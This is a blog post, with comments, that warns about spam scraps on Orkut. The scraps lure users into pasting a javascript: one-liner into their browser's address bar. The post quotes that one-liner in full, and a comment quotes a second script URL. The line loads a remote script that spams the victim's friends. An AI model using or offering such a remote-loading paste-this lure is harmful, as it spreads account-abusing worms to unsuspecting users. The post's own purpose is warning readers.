RSS2.0

I moved to Debiprasad.net. Now I am blogging there, so please visit Debiprasad.net and keep me reading. love, Debiprasad

Ask questions related to online shopping in India

Where to buy online in India?

wheretobuyonline.in

SQL or Script Injections in Orkut

Now a days, I am getting some spam scraps as the following.

Hey..One girl is about u.. also written about u in her ABOUT ME..And she added Your profile link and some of ur photos also...in her Profile..
Her profile link..

http://www.orkut.com/Profile.aspx?uid=16225293724851058484

I saw Your pics from her Profile..Super..Reply

When you will click on the profile link, it will open that persons profile and in about me you can find some message as following.

To see soMe of my friend pics....many are there[Cant write here]

Clear ur address bar..copy paste.. Below Script To See This Person's Picture:-

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://picsfriends565.110mb.com/gudfoto.js';void(0)

I always avoid this and delete the scrap from my scrapbook as I know this is nothing but a attempt to have SQL or Script injection or Session Hijacking script. I am interested to see the JavaScript code and analyze it and to determine, what is the script doing. But, due to lack of time I say I will do it later. But today how ever I looked at one script. From this I understand that, the script is using popular web 2.0 technology Ajax, and let me explain what it does.

First it collects your friend list and sends that scrap to all and then displays some text about sql injection and ethical hacking. And with this it also displays your friends profile photos. My system is now crashing frequently. I hope this will be fixed in this week. After that I will play with all these scripts and post in detail. I promise that I will also help you to play with me.

And be careful, never run such scripts on your address bar. If you want to ask anything you can post here, I will reply.

SQL or Script Injections in OrkutSocialTwist Tell-a-Friend TwitThis Reading: SQL or Script Injections in OrkutPost Link to Twitter

6 comments:

gargi said...

bu its safe or not

Debiprasad Sahoo said...

Hi, Gargi. Thanks for your question/comment.

Well, after running this script on your browser address bar, you have to wait some time to see what happens. Here according to my knowledge and analysis, you will see one description of sql injections with one related Orkut community in that page with your friends photos. And particularly for this code, I did not find any hijacking code. It may not be unsafe, but why need you to do so?

Once again, I warn you to not to run such scripts on your browser address bar. If you have got another script, please let me know, I will find time to analyze this.

Debiprasad Sahoo said...

Update News:
The specific URL of that JavaScript is not available now on the sever now. That sub domain picsfriends565 of 110mb.com is also deleted. I have not copied the script and I lost this script to analyze and play with it. If anyone of you have this script, please email me.

Unknown said...

i have recieved same message as typed by u..my frnd has send it 2 me but i dont know d person in whos ABOUT ME my profile is added...wat shud i do..???

Debiprasad Sahoo said...

Hi Geetika, Thanks for your question/comment.

Your friend has not sent you anything. He/she has just ran the script on his/her browser. So you get that scrap automatically.

Your profile has not added in that about me of that person. This is only a trick. If I will click on the link, I will see my profile. So need not to be worry. Please see my latest post on this.
Saw link to your profile in Orkut in an unknown's profile?.

You are welcome to ask me anything. You can email or post here in comments.

Debiprasad Sahoo said...

Recent Update:

Today I noticed that, in that profile, the url of the script got changed. Now the path to the script is http://coolpics98.110mb.com/gudfoto.js

If you have any question please ask here or email me.

My Shared Items in Google Reader

My Blogroll

Followers

Want to see/show anything here? Contact me :)